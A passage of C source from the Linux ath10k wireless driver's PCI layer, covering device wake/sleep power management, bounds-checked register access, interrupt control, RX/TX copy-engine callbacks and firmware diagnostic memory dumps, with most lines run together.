ath10k_pci_priv(ar); u32 val = ioread32(ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + RTC_STATE_ADDRESS); return RTC_STATE_V_GET(val) == RTC_STATE_V_ON; } static void __ath10k_pci_wake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); lockdep_assert_held(&ar_pci->ps_lock); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake reg refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); iowrite32(PCIE_SOC_WAKE_V_MASK, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); } static void __ath10k_pci_sleep(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); lockdep_assert_held(&ar_pci->ps_lock); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep reg refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); iowrite32(PCIE_SOC_WAKE_RESET, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); ar_pci->ps_awake = false; } static int ath10k_pci_wake_wait(struct ath10k *ar) { int tot_delay = 0; int curr_delay = 5; while (tot_delay < PCIE_WAKE_TIMEOUT) { if (ath10k_pci_is_awake(ar)) { if (tot_delay > PCIE_WAKE_LATE_US) ath10k_warn(ar, "device wakeup took %d ms which is unusually long, otherwise it works normally.\n", tot_delay / 1000); 
return 0; } udelay(curr_delay); tot_delay += curr_delay; if (curr_delay < 50) curr_delay += 5; } return -ETIMEDOUT; } static int ath10k_pci_force_wake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; int ret = 0; if (ar_pci->pci_ps) return ret; spin_lock_irqsave(&ar_pci->ps_lock, flags); if (!ar_pci->ps_awake) { iowrite32(PCIE_SOC_WAKE_V_MASK, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); ret = ath10k_pci_wake_wait(ar); if (ret == 0) ar_pci->ps_awake = true; } spin_unlock_irqrestore(&ar_pci->ps_lock, flags); return ret; } static void ath10k_pci_force_sleep(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; spin_lock_irqsave(&ar_pci->ps_lock, flags); iowrite32(PCIE_SOC_WAKE_RESET, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); ar_pci->ps_awake = false; spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static int ath10k_pci_wake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; int ret = 0; if (ar_pci->pci_ps == 0) return ret; spin_lock_irqsave(&ar_pci->ps_lock, flags); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); /* This function can be called very frequently. To avoid excessive * CPU stalls for MMIO reads use a cache var to hold the device state. */ if (!ar_pci->ps_awake) { __ath10k_pci_wake(ar); ret = ath10k_pci_wake_wait(ar); if (ret == 0) ar_pci->ps_awake = true; } if (ret == 0) { ar_pci->ps_wake_refcount++; WARN_ON(ar_pci->ps_wake_refcount == 0); } spin_unlock_irqrestore(&ar_pci->ps_lock, flags); return ret; } static void ath10k_pci_sleep(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; if (ar_pci->pci_ps == 0) return; spin_lock_irqsave(&ar_pci->ps_lock, flags); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); if (WARN_ON(ar_pci->ps_wake_refcount == 0)) goto skip; ar_pci->ps_wake_refcount--; mod_timer(&ar_pci->ps_timer, jiffies + msecs_to_jiffies(ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC)); skip: spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static void ath10k_pci_ps_timer(struct timer_list *t) { struct ath10k_pci *ar_pci = from_timer(ar_pci, t, ps_timer); struct ath10k *ar = ar_pci->ar; unsigned long flags; spin_lock_irqsave(&ar_pci->ps_lock, flags); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps timer refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); if (ar_pci->ps_wake_refcount > 0) goto skip; __ath10k_pci_sleep(ar); skip: spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static void ath10k_pci_sleep_sync(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; if (ar_pci->pci_ps == 0) { ath10k_pci_force_sleep(ar); return; } del_timer_sync(&ar_pci->ps_timer); spin_lock_irqsave(&ar_pci->ps_lock, flags); WARN_ON(ar_pci->ps_wake_refcount > 0); __ath10k_pci_sleep(ar); spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static void ath10k_bus_pci_write32(struct ath10k *ar, u32 offset, u32 value) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; if (unlikely(offset + sizeof(value) > ar_pci->mem_len)) { ath10k_warn(ar, "refusing to write mmio out of bounds at 0x%08x - 0x%08zx (max 0x%08zx)\n", offset, offset + sizeof(value), ar_pci->mem_len); return; } ret = ath10k_pci_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake target for write32 of 0x%08x at 0x%08x: %d\n", value, offset, ret); return; 
} iowrite32(value, ar_pci->mem + offset); ath10k_pci_sleep(ar); } static u32 ath10k_bus_pci_read32(struct ath10k *ar, u32 offset) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); u32 val; int ret; if (unlikely(offset + sizeof(val) > ar_pci->mem_len)) { ath10k_warn(ar, "refusing to read mmio out of bounds at 0x%08x - 0x%08zx (max 0x%08zx)\n", offset, offset + sizeof(val), ar_pci->mem_len); return 0; } ret = ath10k_pci_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake target for read32 at 0x%08x: %d\n", offset, ret); return 0xffffffff; } val = ioread32(ar_pci->mem + offset); ath10k_pci_sleep(ar); return val; } inline void ath10k_pci_write32(struct ath10k *ar, u32 offset, u32 value) { struct ath10k_ce *ce = ath10k_ce_priv(ar); ce->bus_ops->write32(ar, offset, value); } inline u32 ath10k_pci_read32(struct ath10k *ar, u32 offset) { struct ath10k_ce *ce = ath10k_ce_priv(ar); return ce->bus_ops->read32(ar, offset); } u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr) { return ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + addr); } void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val) { ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + addr, val); } u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr) { return ath10k_pci_read32(ar, PCIE_LOCAL_BASE_ADDRESS + addr); } void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val) { ath10k_pci_write32(ar, PCIE_LOCAL_BASE_ADDRESS + addr, val); } bool ath10k_pci_irq_pending(struct ath10k *ar) { u32 cause; /* Check if the shared legacy irq is for us */ cause = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_CAUSE_ADDRESS); if (cause & (PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL)) return true; return false; } void ath10k_pci_disable_and_clear_legacy_irq(struct ath10k *ar) { /* IMPORTANT: INTR_CLR register has to be set after * INTR_ENABLE is set to 0, otherwise interrupt can not be * really cleared. */ ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, 0); ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_CLR_ADDRESS, PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL); /* IMPORTANT: this extra read transaction is required to * flush the posted write buffer. */ (void)ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS); } void ath10k_pci_enable_legacy_irq(struct ath10k *ar) { ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL); /* IMPORTANT: this extra read transaction is required to * flush the posted write buffer. 
*/ (void)ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS); } static inline const char *ath10k_pci_get_irq_method(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (ar_pci->oper_irq_mode == ATH10K_PCI_IRQ_MSI) return "msi"; return "legacy"; } static int __ath10k_pci_rx_post_buf(struct ath10k_pci_pipe *pipe) { struct ath10k *ar = pipe->hif_ce_state; struct ath10k_ce *ce = ath10k_ce_priv(ar); struct ath10k_ce_pipe *ce_pipe = pipe->ce_hdl; struct sk_buff *skb; dma_addr_t paddr; int ret; skb = dev_alloc_skb(pipe->buf_sz); if (!skb) return -ENOMEM; WARN_ONCE((unsigned long)skb->data & 3, "unaligned skb"); paddr = dma_map_single(ar->dev, skb->data, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); if (unlikely(dma_mapping_error(ar->dev, paddr))) { ath10k_warn(ar, "failed to dma map pci rx buf\n"); dev_kfree_skb_any(skb); return -EIO; } ATH10K_SKB_RXCB(skb)->paddr = paddr; spin_lock_bh(&ce->ce_lock); ret = ce_pipe->ops->ce_rx_post_buf(ce_pipe, skb, paddr); spin_unlock_bh(&ce->ce_lock); if (ret) { dma_unmap_single(ar->dev, paddr, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); dev_kfree_skb_any(skb); return ret; } return 0; } static void ath10k_pci_rx_post_pipe(struct ath10k_pci_pipe *pipe) { struct ath10k *ar = pipe->hif_ce_state; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_ce *ce = ath10k_ce_priv(ar); struct ath10k_ce_pipe *ce_pipe = pipe->ce_hdl; int ret, num; if (pipe->buf_sz == 0) return; if (!ce_pipe->dest_ring) return; spin_lock_bh(&ce->ce_lock); num = __ath10k_ce_rx_num_free_bufs(ce_pipe); spin_unlock_bh(&ce->ce_lock); while (num >= 0) { ret = __ath10k_pci_rx_post_buf(pipe); if (ret) { if (ret == -ENOSPC) break; ath10k_warn(ar, "failed to post pci rx buf: %d\n", ret); mod_timer(&ar_pci->rx_post_retry, jiffies + ATH10K_PCI_RX_POST_RETRY_MS); break; } num--; } } void ath10k_pci_rx_post(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int i; for (i = 0; i < CE_COUNT; i++) ath10k_pci_rx_post_pipe(&ar_pci->pipe_info[i]); } void ath10k_pci_rx_replenish_retry(struct timer_list *t) { struct ath10k_pci *ar_pci = from_timer(ar_pci, t, rx_post_retry); struct ath10k *ar = ar_pci->ar; ath10k_pci_rx_post(ar); } static u32 ath10k_pci_qca988x_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { u32 val = 0, region = addr & 0xfffff; val = (ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS) & 0x7ff) << 21; val |= 0x100000 | region; return val; } /* Refactor from ath10k_pci_qca988x_targ_cpu_to_ce_addr. * Support to access target space below 1M for qca6174 and qca9377. * If target space is below 1M, the bit[20] of converted CE addr is 0. * Otherwise bit[20] of converted CE addr is 1. */ static u32 ath10k_pci_qca6174_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { u32 val = 0, region = addr & 0xfffff; val = (ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS) & 0x7ff) << 21; val |= ((addr >= 0x100000) ? 0x100000 : 0) | region; return val; } static u32 ath10k_pci_qca99x0_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { u32 val = 0, region = addr & 0xfffff; val = ath10k_pci_read32(ar, PCIE_BAR_REG_ADDRESS); val |= 0x100000 | region; return val; } static u32 ath10k_pci_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (WARN_ON_ONCE(!ar_pci->targ_cpu_to_ce_addr)) return -ENOTSUPP; return ar_pci->targ_cpu_to_ce_addr(ar, addr); } /* * Diagnostic read/write access is provided for startup/config/debug usage. 
* Caller must guarantee proper alignment, when applicable, and single user * at any moment. */ static int ath10k_pci_diag_read_mem(struct ath10k *ar, u32 address, void *data, int nbytes) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret = 0; u32 *buf; unsigned int completed_nbytes, alloc_nbytes, remaining_bytes; struct ath10k_ce_pipe *ce_diag; /* Host buffer address in CE space */ u32 ce_data; dma_addr_t ce_data_base = 0; void *data_buf; int i; mutex_lock(&ar_pci->ce_diag_mutex); ce_diag = ar_pci->ce_diag; /* * Allocate a temporary bounce buffer to hold caller's data * to be DMA'ed from Target. This guarantees * 1) 4-byte alignment * 2) Buffer in DMA-able space */ alloc_nbytes = min_t(unsigned int, nbytes, DIAG_TRANSFER_LIMIT); data_buf = dma_alloc_coherent(ar->dev, alloc_nbytes, &ce_data_base, GFP_ATOMIC); if (!data_buf) { ret = -ENOMEM; goto done; } /* The address supplied by the caller is in the * Target CPU virtual address space. * * In order to use this address with the diagnostic CE, * convert it from Target CPU virtual address space * to CE address space */ address = ath10k_pci_targ_cpu_to_ce_addr(ar, address); remaining_bytes = nbytes; ce_data = ce_data_base; while (remaining_bytes) { nbytes = min_t(unsigned int, remaining_bytes, DIAG_TRANSFER_LIMIT); ret = ath10k_ce_rx_post_buf(ce_diag, &ce_data, ce_data); if (ret != 0) goto done; /* Request CE to send from Target(!) address to Host buffer */ ret = ath10k_ce_send(ce_diag, NULL, (u32)address, nbytes, 0, 0); if (ret) goto done; i = 0; while (ath10k_ce_completed_send_next(ce_diag, NULL) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } i = 0; while (ath10k_ce_completed_recv_next(ce_diag, (void **)&buf, &completed_nbytes) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } if (nbytes != completed_nbytes) { ret = -EIO; goto done; } if (*buf != ce_data) { ret = -EIO; goto done; } remaining_bytes -= nbytes; memcpy(data, data_buf, nbytes); address += nbytes; data += nbytes; } done: if (data_buf) dma_free_coherent(ar->dev, alloc_nbytes, data_buf, ce_data_base); mutex_unlock(&ar_pci->ce_diag_mutex); return ret; } static int ath10k_pci_diag_read32(struct ath10k *ar, u32 address, u32 *value) { __le32 val = 0; int ret; ret = ath10k_pci_diag_read_mem(ar, address, &val, sizeof(val)); *value = __le32_to_cpu(val); return ret; } static int __ath10k_pci_diag_read_hi(struct ath10k *ar, void *dest, u32 src, u32 len) { u32 host_addr, addr; int ret; host_addr = host_interest_item_address(src); ret = ath10k_pci_diag_read32(ar, host_addr, &addr); if (ret != 0) { ath10k_warn(ar, "failed to get memcpy hi address for firmware address %d: %d\n", src, ret); return ret; } ret = ath10k_pci_diag_read_mem(ar, addr, dest, len); if (ret != 0) { ath10k_warn(ar, "failed to memcpy firmware memory from %d (%d B): %d\n", addr, len, ret); return ret; } return 0; } #define ath10k_pci_diag_read_hi(ar, dest, src, len) \ __ath10k_pci_diag_read_hi(ar, dest, HI_ITEM(src), len) int ath10k_pci_diag_write_mem(struct ath10k *ar, u32 address, const void *data, int nbytes) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret = 0; u32 *buf; unsigned int completed_nbytes, alloc_nbytes, remaining_bytes; struct ath10k_ce_pipe *ce_diag; void *data_buf; dma_addr_t ce_data_base = 0; int i; mutex_lock(&ar_pci->ce_diag_mutex); ce_diag = ar_pci->ce_diag; /* * Allocate a temporary bounce buffer to hold caller's 
data * to be DMA'ed to Target. This guarantees * 1) 4-byte alignment * 2) Buffer in DMA-able space */ alloc_nbytes = min_t(unsigned int, nbytes, DIAG_TRANSFER_LIMIT); data_buf = dma_alloc_coherent(ar->dev, alloc_nbytes, &ce_data_base, GFP_ATOMIC); if (!data_buf) { ret = -ENOMEM; goto done; } /* * The address supplied by the caller is in the * Target CPU virtual address space. * * In order to use this address with the diagnostic CE, * convert it from * Target CPU virtual address space * to * CE address space */ address = ath10k_pci_targ_cpu_to_ce_addr(ar, address); remaining_bytes = nbytes; while (remaining_bytes) { /* FIXME: check cast */ nbytes = min_t(int, remaining_bytes, DIAG_TRANSFER_LIMIT); /* Copy caller's data to allocated DMA buf */ memcpy(data_buf, data, nbytes); /* Set up to receive directly into Target(!) address */ ret = ath10k_ce_rx_post_buf(ce_diag, &address, address); if (ret != 0) goto done; /* * Request CE to send caller-supplied data that * was copied to bounce buffer to Target(!) address. */ ret = ath10k_ce_send(ce_diag, NULL, ce_data_base, nbytes, 0, 0); if (ret != 0) goto done; i = 0; while (ath10k_ce_completed_send_next(ce_diag, NULL) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } i = 0; while (ath10k_ce_completed_recv_next(ce_diag, (void **)&buf, &completed_nbytes) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } if (nbytes != completed_nbytes) { ret = -EIO; goto done; } if (*buf != address) { ret = -EIO; goto done; } remaining_bytes -= nbytes; address += nbytes; data += nbytes; } done: if (data_buf) { dma_free_coherent(ar->dev, alloc_nbytes, data_buf, ce_data_base); } if (ret != 0) ath10k_warn(ar, "failed to write diag value at 0x%x: %d\n", address, ret); mutex_unlock(&ar_pci->ce_diag_mutex); return ret; } static int ath10k_pci_diag_write32(struct ath10k *ar, u32 address, u32 value) { __le32 val = __cpu_to_le32(value); return ath10k_pci_diag_write_mem(ar, address, &val, sizeof(val)); } /* Called by lower (CE) layer when a send to Target completes. 
*/ static void ath10k_pci_htc_tx_cb(struct ath10k_ce_pipe *ce_state) { struct ath10k *ar = ce_state->ar; struct sk_buff_head list; struct sk_buff *skb; __skb_queue_head_init(&list); while (ath10k_ce_completed_send_next(ce_state, (void **)&skb) == 0) { /* no need to call tx completion for NULL pointers */ if (skb == NULL) continue; __skb_queue_tail(&list, skb); } while ((skb = __skb_dequeue(&list))) ath10k_htc_tx_completion_handler(ar, skb); } static void ath10k_pci_process_rx_cb(struct ath10k_ce_pipe *ce_state, void (*callback)(struct ath10k *ar, struct sk_buff *skb)) { struct ath10k *ar = ce_state->ar; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pipe_info = &ar_pci->pipe_info[ce_state->id]; struct sk_buff *skb; struct sk_buff_head list; void *transfer_context; unsigned int nbytes, max_nbytes; __skb_queue_head_init(&list); while (ath10k_ce_completed_recv_next(ce_state, &transfer_context, &nbytes) == 0) { skb = transfer_context; max_nbytes = skb->len + skb_tailroom(skb); dma_unmap_single(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, max_nbytes, DMA_FROM_DEVICE); if (unlikely(max_nbytes < nbytes)) { ath10k_warn(ar, "rxed more than expected (nbytes %d, max %d)", nbytes, max_nbytes); dev_kfree_skb_any(skb); continue; } skb_put(skb, nbytes); __skb_queue_tail(&list, skb); } while ((skb = __skb_dequeue(&list))) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci rx ce pipe %d len %d\n", ce_state->id, skb->len); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci rx: ", skb->data, skb->len); callback(ar, skb); } ath10k_pci_rx_post_pipe(pipe_info); } static void ath10k_pci_process_htt_rx_cb(struct ath10k_ce_pipe *ce_state, void (*callback)(struct ath10k *ar, struct sk_buff *skb)) { struct ath10k *ar = ce_state->ar; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pipe_info = &ar_pci->pipe_info[ce_state->id]; struct ath10k_ce_pipe *ce_pipe = pipe_info->ce_hdl; struct sk_buff *skb; struct sk_buff_head list; void *transfer_context; unsigned int nbytes, max_nbytes, nentries; int orig_len; /* No need to acquire ce_lock for CE5, since this is the only place CE5 * is processed other than init and deinit. Before releasing CE5 * buffers, interrupts are disabled. Thus CE5 access is serialized. */ __skb_queue_head_init(&list); while (ath10k_ce_completed_recv_next_nolock(ce_state, &transfer_context, &nbytes) == 0) { skb = transfer_context; max_nbytes = skb->len + skb_tailroom(skb); if (unlikely(max_nbytes < nbytes)) { ath10k_warn(ar, "rxed more than expected (nbytes %d, max %d)", nbytes, max_nbytes); continue; } dma_sync_single_for_cpu(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, max_nbytes, DMA_FROM_DEVICE); skb_put(skb, nbytes); __skb_queue_tail(&list, skb); } nentries = skb_queue_len(&list); while ((skb = __skb_dequeue(&list))) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci rx ce pipe %d len %d\n", ce_state->id, skb->len); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci rx: ", skb->data, skb->len); orig_len = skb->len; callback(ar, skb); skb_push(skb, orig_len - skb->len); skb_reset_tail_pointer(skb); skb_trim(skb, 0); /*let device gain the buffer again*/ dma_sync_single_for_device(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); } ath10k_ce_rx_update_write_idx(ce_pipe, nentries); } /* Called by lower (CE) layer when data is received from the Target. 
*/ static void ath10k_pci_htc_rx_cb(struct ath10k_ce_pipe *ce_state) { ath10k_pci_process_rx_cb(ce_state, ath10k_htc_rx_completion_handler); } static void ath10k_pci_htt_htc_rx_cb(struct ath10k_ce_pipe *ce_state) { /* CE4 polling needs to be done whenever CE pipe which transports * HTT Rx (target->host) is processed. */ ath10k_ce_per_engine_service(ce_state->ar, 4); ath10k_pci_process_rx_cb(ce_state, ath10k_htc_rx_completion_handler); } /* Called by lower (CE) layer when data is received from the Target. * Only 10.4 firmware uses separate CE to transfer pktlog data. */ static void ath10k_pci_pktlog_rx_cb(struct ath10k_ce_pipe *ce_state) { ath10k_pci_process_rx_cb(ce_state, ath10k_htt_rx_pktlog_completion_handler); } /* Called by lower (CE) layer when a send to HTT Target completes. */ static void ath10k_pci_htt_tx_cb(struct ath10k_ce_pipe *ce_state) { struct ath10k *ar = ce_state->ar; struct sk_buff *skb; while (ath10k_ce_completed_send_next(ce_state, (void **)&skb) == 0) { /* no need to call tx completion for NULL pointers */ if (!skb) continue; dma_unmap_single(ar->dev, ATH10K_SKB_CB(skb)->paddr, skb->len, DMA_TO_DEVICE); ath10k_htt_hif_tx_complete(ar, skb); } } static void ath10k_pci_htt_rx_deliver(struct ath10k *ar, struct sk_buff *skb) { skb_pull(skb, sizeof(struct ath10k_htc_hdr)); ath10k_htt_t2h_msg_handler(ar, skb); } /* Called by lower (CE) layer when HTT data is received from the Target. */ static void ath10k_pci_htt_rx_cb(struct ath10k_ce_pipe *ce_state) { /* CE4 polling needs to be done whenever CE pipe which transports * HTT Rx (target->host) is processed. */ ath10k_ce_per_engine_service(ce_state->ar, 4); ath10k_pci_process_htt_rx_cb(ce_state, ath10k_pci_htt_rx_deliver); } int ath10k_pci_hif_tx_sg(struct ath10k *ar, u8 pipe_id, struct ath10k_hif_sg_item *items, int n_items) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_ce *ce = ath10k_ce_priv(ar); struct ath10k_pci_pipe *pci_pipe = &ar_pci->pipe_info[pipe_id]; struct ath10k_ce_pipe *ce_pipe = pci_pipe->ce_hdl; struct ath10k_ce_ring *src_ring = ce_pipe->src_ring; unsigned int nentries_mask; unsigned int sw_index; unsigned int write_index; int err, i = 0; spin_lock_bh(&ce->ce_lock); nentries_mask = src_ring->nentries_mask; sw_index = src_ring->sw_index; write_index = src_ring->write_index; if (unlikely(CE_RING_DELTA(nentries_mask, write_index, sw_index - 1) < n_items)) { err = -ENOBUFS; goto err; } for (i = 0; i < n_items - 1; i++) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci tx item %d paddr %pad len %d n_items %d\n", i, &items[i].paddr, items[i].len, n_items); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci tx data: ", items[i].vaddr, items[i].len); err = ath10k_ce_send_nolock(ce_pipe, items[i].transfer_context, items[i].paddr, items[i].len, items[i].transfer_id, CE_SEND_FLAG_GATHER); if (err) goto err; } /* `i` is equal to `n_items -1` after for() */ ath10k_dbg(ar, ATH10K_DBG_PCI, "pci tx item %d paddr %pad len %d n_items %d\n", i, &items[i].paddr, items[i].len, n_items); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci tx data: ", items[i].vaddr, items[i].len); err = ath10k_ce_send_nolock(ce_pipe, items[i].transfer_context, items[i].paddr, items[i].len, items[i].transfer_id, 0); if (err) goto err; spin_unlock_bh(&ce->ce_lock); return 0; err: for (; i > 0; i--) __ath10k_ce_send_revert(ce_pipe); spin_unlock_bh(&ce->ce_lock); return err; } int ath10k_pci_hif_diag_read(struct ath10k *ar, u32 address, void *buf, size_t buf_len) { return ath10k_pci_diag_read_mem(ar, address, buf, buf_len); } u16 
ath10k_pci_hif_get_free_queue_number(struct ath10k *ar, u8 pipe) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif get free queue number\n"); return ath10k_ce_num_free_src_entries(ar_pci->pipe_info[pipe].ce_hdl); } static void ath10k_pci_dump_registers(struct ath10k *ar, struct ath10k_fw_crash_data *crash_data) { __le32 reg_dump_values[REG_DUMP_COUNT_QCA988X] = {}; int i, ret; lockdep_assert_held(&ar->dump_mutex); ret = ath10k_pci_diag_read_hi(ar, &reg_dump_values[0], hi_failure_state, REG_DUMP_COUNT_QCA988X * sizeof(__le32)); if (ret) { ath10k_err(ar, "failed to read firmware dump area: %d\n", ret); return; } BUILD_BUG_ON(REG_DUMP_COUNT_QCA988X % 4); ath10k_err(ar, "firmware register dump:\n"); for (i = 0; i < REG_DUMP_COUNT_QCA988X; i += 4) ath10k_err(ar, "[%02d]: 0x%08X 0x%08X 0x%08X 0x%08X\n", i, __le32_to_cpu(reg_dump_values[i]), __le32_to_cpu(reg_dump_values[i + 1]), __le32_to_cpu(reg_dump_values[i + 2]), __le32_to_cpu(reg_dump_values[i + 3])); if (!crash_data) return; for (i = 0; i < REG_DUMP_COUNT_QCA988X; i++) crash_data->registers[i] = reg_dump_values[i]; } static int ath10k_pci_dump_memory_section(struct ath10k *ar, const struct ath10k_mem_region *mem_region, u8 *buf, size_t buf_len) { const struct ath10k_mem_section *cur_section, *next_section; unsigned int count, section_size, skip_size; int ret, i, j; if (!mem_region || !buf) return 0; cur_section = &mem_region->section_table.sections[0]; if (mem_region->start > cur_section->start) { ath10k_warn(ar, "incorrect memdump region 0x%x with section start address 0x%x.\n", mem_region->start, cur_section->start); return 0; } skip_size = cur_section->start - mem_region->start; /* fill the gap between the first register section and register * start address */ for (i = 0; i < skip_size; i++) { *buf = ATH10K_MAGIC_NOT_COPIED; buf++; } count = 0; for (i = 0; cur_section != NULL; i++) { section_size = cur_section->end - cur_section->start; if (section_size <= 0) { ath10k_warn(ar, "incorrect ramdump format with start address 0x%x and stop address 0x%x\n", cur_section->start, cur_section->end); break; } if ((i + 1) == mem_region->section_table.size) { /* last section */ next_section = NULL; skip_size = 0; } else { next_section = cur_section + 1; if (cur_section->end > next_section->start) { ath10k_warn(ar, "next ramdump section 0x%x is smaller than current end address 0x%x\n", next_section->start, cur_section->end); break; } skip_size = next_section->start - cur_section->end; } if (buf_len < (skip_size + section_size)) { ath10k_warn(ar, "ramdump buffer is too small: %zu\n", buf_len); break; } buf_len -= skip_size + section_size; /* read section to dest memory */ ret = ath10k_pci_diag_read_mem(ar, cur_section->start, buf, section_size); if (ret) { ath10k_warn(ar, "failed to read ramdump from section 0x%x: %d\n", cur_section->start, ret); break; } buf += section_size; count += section_size; /* fill in the gap between this section and the next */ for (j = 0; j < skip_size; j++) { *buf = ATH10K_MAGIC_NOT_COPIED; buf++; } count += skip_size; if (!next_section) /* this was the last section */ break; cur_section = next_section; } return count; } static int ath10k_pci_set_ram_config(struct ath10k *ar, u32 config) { u32 val; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + FW_RAM_CONFIG_ADDRESS, config); val = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + FW_RAM_CONFIG_ADDRESS); if (val != config) { ath10k_warn(ar, "failed to set RAM config from 0x%x to 0x%x\n", val, config); return -EIO; } return 0; } /* if an 
error happened, returns < 0; otherwise returns the length */
static int ath10k_pci_dump_memory_sram(struct ath10k *ar,
				       const struct ath10k_mem_region *region,
				       u8 *buf)
{
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);
	u32 base_addr, i;

	base_addr = ioread32(ar_pci->mem + QCA99X0_PCIE_BAR0_START_REG);
	base_addr += region->start;

	for (i = 0; i < region->len; i += 4) {
		iowrite32(base_addr + i, ar_pci->mem + QCA99X0_CPU_MEM_ADDR_REG);
		*(u32 *)(buf + i) = ioread32(ar_pci->mem +
					     QCA99X0_CPU_MEM_DATA_REG);
	}

	return region->len;
}

